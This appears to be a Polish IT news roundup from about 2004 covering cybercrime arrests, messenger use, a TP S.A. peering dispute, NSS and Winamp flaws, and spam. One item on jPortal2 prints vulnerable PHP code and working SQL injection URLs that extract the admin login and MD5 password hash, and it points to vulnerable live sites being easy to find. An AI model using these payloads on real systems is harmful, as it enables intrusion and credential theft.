Aktualności

Prawnik John Ashcroft poinformował wczorajszego dnia o doprowadzeniu do aresztowania lub skazania ponad 150 osób za przestępstwa komputerowe. Określono około 150 000 ofiar przestępstw komputerowych a straty oszacowano na 215 mln. USD.

Operacja Web Snare jest dotychczas największą przeprowadzoną tego typu akcją skierowaną przeciwko cyber przestępcom informuje Ashcroft.

Alan Paller dyrektor SANS Institute uważa iż tego typu operacja odniesie tylko powierzchowny sukces i nie doprowadzi do zatrzymania istotnych problemów w kwestii bezpieczeństwa.

Źródło informacji: USAToday.com

Jak wynika z najnowszego badania rynku amerykańskiego, komunikatory internetowe są używane coraz bardziej masowo. I coraz częściej stają się narzędziem pracy w biznesie. Sondaż na ten temat przeprowadziły w lipcu tego roku spółka internetowa America Online i firma badawcza Opinion Research Corporation (objęto nim 4,5 tys. osób).

Okazuje się, że komunikatory (mowa o tzw. technologii instant messaging, w Polsce najpopularniejszym z takich narzędzi jest Gadu-Gadu) już dość powszechnie zawędrowały do amerykańskich firm – ponad jedna czwarta respondentów (27 proc.) stosuje je w miejscu pracy. To znacznie więcej niż jeszcze rok temu (16 proc.). Większość osób wykorzystujących komunikator w pracy kontaktuje się za jego pomocą z kolegami z firmy. Ale już przeszło co trzeci badany z tej grupy porozumiewa się przez komunikator także z kontrahentami lub klientami.

Im młodsi ludzie, tym częściej używają komunikatorów. W grupie nastolatków i dorosłych do 21 lat aż dziewięć na dziesięć osób korzysta z tej technologii. Ale nawet wśród osób powyżej 55. roku życia 48 proc. respondentów kontaktuje się przez komunikator. Z badania wynika też, że 29 proc. osób korzystających z komunikatorów używa ich co najmniej tak samo często (lub częściej) niż zwykłej poczty elektronicznej. Nietrudno zgadnąć dlaczego – wymiana myśli i danych trwa tu znacznie szybciej niż w przypadku e-maila. Coraz więcej osób (19 proc. ankietowanych wobec 10 proc. rok temu) nie może się rozstać z komunikatorem i używa programów działających na urządzeniach przenośnych – telefonach komórkowych lub palmtopach.

„Komunikatory stały się częścią naszego codziennego życia, ludzie wykorzystują je we wszystkich swych rolach życiowych – przyjaciela, rodzica czy profesjonalisty. Komunikatory pomagają im podtrzymywać znajomości, zawierać nowe, ale także zwiększać wydajność w pracy” – komentuje Edmund Fish, menedżer America Online (firma ta oferuje jeden z najpopularniejszych w USA komunikatorów AOL Instant Messenger).

Według firmy badawczo-statystyczniej IDC obecnie na świecie wysyłanych jest dziennie ponad 7 mld komunikatów w technologii instant messaging. Inna firma, ComScore Media Metrix, podaje, że komunikatorów regularnie używa na świecie 250 mln ludzi (w tym 80 mln Amerykanów).

Źródło informacji: Gazeta.pl

Niezależni operatorzy oraz portale – sygnatariusze listu otwartego skierowanego na przełomie maja i czerwca tego roku do Prezesa Telekomunikacji Polskiej w sprawie zmiany warunków wymiany ruchu internetowego, są wysoce zaniepokojeni treścią otrzymanej w ostatnich dniach czerwca odpowiedzi od TP S.A.

W liście do TP 14 największych operatorów Internetu i dostawców treści zwróciło uwagę na wykorzystywanie przez TP SA dominującej pozycji na rynku poprzez: stosowanie drastycznie odbiegających od europejskich standardów opłat za wymianę ruchu internetowego, brak polityki bezpłatnej współpracy z dużymi operatorami oraz ograniczanie ruchu do polskich dostawców treści i usług na łączach międzynarodowych.

W odpowiedzi TP S.A. odrzuca argumenty przytoczone przez operatorów niezależnych i jednocześnie podtrzymuje zasadność obranej przez siebie polityki. Niestety w przesłanym liście nie znalazło się zaproszenie koalicji operatorów do rozmów.

TP S.A. zadeklarowała natomiast rozpoczęcie prac nad wypracowaniem polityki peeringowej opartej na europejskich standardach, jednakże bez podania szczegółów proponowanych zasad oraz planowanego terminu ogłoszenia polityki.

Obecnie TP S.A. pobiera opłaty od swoich abonentów korzystających z Internetu i jednocześnie za tak generowany ruch internetowy od portali i operatorów, z których zasobów ci abonenci korzystają.

Ceny za dostęp tylko do sieci internetowej TP S.A. są kilkukrotnie wyższe od cen korzystania z globalnych zasobów udostępnianych przez operatorów międzynarodowych. Operatorzy Internetu i portale nie uznają argumentacji TP S.A., iż powodem tego jest przeinwestowanie na rynku dostawców sieci międzynarodowych. Jednocześnie TP S.A. wyeliminowała operatorów międzynarodowych z ”wolnorynkowej gry”, ograniczając pasmo do wybranych operatorów krajowych, czy degradując jakość połączeń z nimi poprzez obcinanie pakietów TCP/IP.

Koalicja zapowiada kontynuowanie działań zmierzających do zmiany obecnej sytuacji zarówno w drodze postępowania w kraju, jak i na szczeblu organizacji międzynarodowych.

Źródło informacji: Application Service Providing

Internet Security Systems (ISS) ostrzega swoich klientów przed krytycznym błędem wykrytym w technologii opracowanej przez Mozilla Foundation nazwanej Netscape Network Security Services (NSS). Biblioteka pozwala przeprowadzić zdalny atak przeciwko serwerom stron.

Netscape Network Security Services (NSS) jest implementacją biblioteki Secure Sockets Layer Version 2 (SSLv2). Podatne na błąd są Netscape Enterprise Server i Sun Java System Web Server, jednak podatność może dotyczyć również innych systemów wykorzystujących bibliotekę open-source NSS.

Problem występuję gdy biblioteka NSS wysyła zapytanie o nową sesję SSLv2. Serwer nie sprawdza długości rekordu w pierwszej części komunikacji między dwoma systemami.

Hackerzy mogą wykorzystać nie sprawdzenie długości rekordu i uruchomić niebezpieczny kod w podatnym systemie.

Przeprowadzenie pomyślnego ataku umożliwia dostęp do systemu z przywilejami użytkownika, który uruchomił serwer web.

Mozilla Foundation udostępniła stosowną poprawkę dla biblioteki NSS dostępną pod tym adresem.

Źródło informacji: InfoWorld

W ramach programu wartego 5 mln dol. do 2010 roku na Jamajce powstanie 60 centrów internetowych. W ramach projektu przeszkolonych zostanie także kilkaset osób. Ceny połączeń internetowych na Jamajce są wyjątkowo wysokie.

Obecnie niecałe 5% spośród 2,6 milionów mieszkańców Jamajki korzysta z internetu. Korzystanie z internetu w tak niskim stopniu przez Jamajczyków uwarunkowane są wysokimi cenami dostępu do sieci – miesięcznie abonament wynosi aż 93 dolary.

Powstanie takiego programu świadczy, iż władze Jamajki wiedzą jak ważne są nowe technologie i jak bardzo mogą one ułatwić, codzienną pracę. Niestety dziwić może fakt, że w naszym kraju nie przeznacza się aż takich środków finansowych na rozwój IT.

Źródło informacji: Gazeta.pl

W odtwarzaczu multimedialnym Winamp występuje błąd, który może zostać wykorzystany do przejęcia komputera ofiary. Na błąd podatne są wszystkie wersje odtwarzacza z serii 3.x oraz 5.x do 5.04 włącznie.

Jak informuje Secunia, problem dotyczy pliku „skórek” w Winampie, które zapisywane są z rozszerzeniem .wsz. A zatem przygotowane specjalne skórki – (np. z zaszytym w nich wirusem) które zostaną pobrane przez użytkownika mogą wywołać umieszczony w nich kod na komputerze ofiary.

Dodatkowym zagrożeniem staje się fakt, że w przypadku posiadania przeglądarki internetowej Internet Explorer, skórki te mogą zostać automatycznie pobrane bez wiedzy użytkownika.

Szczegółowe informacje dotyczące omawianego błędu znajdują sią tutaj.

Zobacz również:
– Bardzo poważny błąd we wszystkich wersjach WinAmp
– Dziura w WinAmpie….
– Bug w winamp’ie
– Wadliwe odtwarzacze

Niemal 200 mln dol. w gotówce i opcjach na akcje zapłaci Cisco Systems za spółkę P-Cube, poinformowano we wtorek.

P-Cube jest producentem oprogramowania do śledzenia ruchu w sieciach komputerowych. Przejęcie P-Cube rozszerzy ofertę Cisco o dodatkowe produkty wykorzystywane przy transmisji głosu przez Internet, grach interaktywnych i wideo na żądanie. W wyniku transakcji zysk spółki obniży się o mniej niż jeden cent na akcję.

Źródło informacji: Gazeta.pl

Wrocławska policja zatrzymała 17-letniego oszusta internetowego, który podszywał się pod sprzedających na portalu Allegro. Podawał kupującym fałszywe dane personalne i numery kont bankowych, na które mieli oni wpłacać pieniądze. Nastolatek w ten sposób wzbogacił się o przynajmniej 100 tys. zł.

17-latek podszywał się pod sprzedających w momencie finalizacji licytacji. „Pocztą elektroniczną rozsyłał do osób biorących udział w aukcjach Allegro komunikaty o wygranej licytacji. Przesyłał im fałszywe dane personalne oraz numery kont bankowych, których był posiadaczem. Na te konta oszukane osoby wpłacały pieniądze” – powiedział Artur Falkiewicz, z biura prasowego Komendy Wojewódzkiej Policji we Wrocławiu.

Dodał, że oszust obserwował licytacje oraz rozsyłał listy z kawiarenek internetowych, „sądząc, że w ten sposób trudno go będzie namierzyć policji”. 17-latek został zatrzymany na gorącym uczynku w jednej z kawiarenek, podczas próby oszukania kolejnej osoby – gratulował kupującemu wygranej licytacji i podawał swoje konto, na które miała być dokonana wpłata.

Zdecydowana większość osób, wobec których 17-latek podjął próbę oszustwa, dała się nabrać.

Policja ostrzega klientów Allegro i innych tego typu portali, aby zachowali należytą ostrożność przy zawieraniu transakcji finansowych.

Falkiewicz powiedział, że jest wiele sposobów, aby nie dać się oszukać. „Przede wszystkim należy identyfikować sprzedającego. Prosić go o adres, numer telefonu i np. dzwonić, aby go sprawdzić. Można też osobiście odebrać kupiony przedmiot o ile sprzedający nie jest z drugiego końca Polski. Jeśli sprzedający jest uczciwy, to nie będzie się ukrywać. Poza tym można zapytać o sprzedającego innych kupujących, czy go znają, albo zwrócić się wprost do administratora portalu, który zawsze pomoże” – wyjaśnił.

Oszust został zatrzymany dzięki ścisłej współpracy z pracownikami działu bezpieczeństwa portalu Allegro. Zatrzymanemu grozi do 8 lat pozbawienia wolności.

Źródło informacji: PAP

jPortal to system pozwalający na prowadzenie własnego portalu/vortalu tematycznego bez praktycznie żadnej wiedzy na temat tworzenia stron. W ostatniej wersji tego systemu występuje błąd pozwalający przeprowadzić atak typu SQL Injection.

SQL Injection to atak powodujący zmianę zapytania SQL, który pozwala zmodyfikować dane dostępne w bazie danych.

Błąd występuje w ostatnim Securite Pack systemu jPortal2 a dokładnie w funkcji comm_title() znajdującej się w pliku como.inc.php. Funkcja przedstawia się następująco:

function comm_title() {
global $news_tbl, $art_tbl, $PHP_SELF, $id, $what, $php_tbl;

if($what==’news’) $tbl = $news_tbl;
if($what==’article’) $tbl = $art_tbl;
if($what==’script’) $tbl = $php_tbl;

$query = „SELECT * FROM $tbl WHERE id=$id”;
$result = mysql_query($query);

$r = mysql_fetch_array($result);

$title = $r[‚title’];
$title = stripslashes($title);
echo „Komentarze do \”$title\””;
}

Jak widać w funkcji brakuje analizy przesyłanych informacji do zmiennej $id co pozwala na wykonanie SQL Injection.

Przykładowe zapytanie, które należy wpisać np. bezpośrednio w adresie URL przeglądarki wygląda następująco:

http://[adres serwera]/comment.php?what=news&id=[id istniejacego newsa] and 1=0 union (select null, null, nick, null, null, null, null, null, null, null, null, null from admins limit n,1)

gdzie w miejsce [adres serwera] należy wpisać adres serwera z działającym systemem jPortal2, natomiast w [id istniejacego newsa] wpisujemy numer identyfikacyjny istniejącego newsa.

Powyższe zapytanie powoduje wyświetlenie na stronie nazwę konta administratora. Warto również wiedzieć, jakie hasło posiada ów administrator. A zatem wystarczy wywołać poniższe zapytanie:

http://[adres serwera]/comment.php?what=news&id=[id istniejacego newsa] and 1=0 union (select null, null, pass, null, null, null, null, null, null, null, null, null from admins limit n,1)

Co w efekcie wyświetli nam na stronie hasło administratora zapisane w postaci md5.

Reasumując nie jest to jedyny błąd, jaki występuje w tym systemie – przykładowo poprzednim razem błąd SQL Injection występował w funkcji art_print().

System jPortal2 działa aktualnie na około 1000 stronach. Większość z nich można znaleźć przy pomocy wyszukiwarki Google bądź skorzystać z gotowej listy stron wykorzystujących system jPortal2 – na pięć losowo wybranych stron z tym systemem tylko trzy z nich były podatne na wyżej opisane błędy. Powodem tego może być starsza wersja bazy danych MySQL – operator UNION dodany został dopiero w wersji MySQL 4.x, bądź zmiana nazwy tabeli admins na inną.

Blisko 43 proc. internetowego spamu (niechcianych e-maili o treściach komercyjnych lub pornograficznych) rozsyłanych jest w świat ze Stanów Zjednoczonych – twierdzi firma komputerowego oprogramowania Sophos w oparciu o dane za ostatnie 5 miesięcy.

Według Sophos’a, który specjalizuje się w programach anty-wirusowych, ustawodawstwo przyjęte w USA (tzw. Can-Spam Act) z myślą o powstrzymaniu spamu nie miało większego skutku.

Amerykańska ustawa przewiduje surowe kary za rozsiewanie spamu i wymaga, by każdy e-mail wysyłany w celach komercyjnych dawał odbiorcy możliwość skasowania przyszłej korespondencji elektronicznej od tego samego nadawcy.

Na drugim miejscu za USA z 15. procentami jest Korea Płd., gdzie zastosowanie superszybkich połączeń z internetem jest najwyższe w świecie. Od lutego do końca lipca br. Korea Płd. potroiła ilość spamu.

Stosunkowo największy postęp w ograniczeniu spamu osiągnęła Kanada, w tym samym okresie zmniejszając ilość niepożądanych e-maili o połowę (z 6,8 proc. do 2,9 proc.) – wynika z badań.

W marcu br. AoL, Yahoo, Microsoft i Earthlink wystąpiły z powództwem przeciwko grupie osób oskarżanych o to, że rozsiewają spam za pośrednictwem trzecich osób, lub używają fikcyjnych adresów zwrotnych.

Źródło informacji: BBC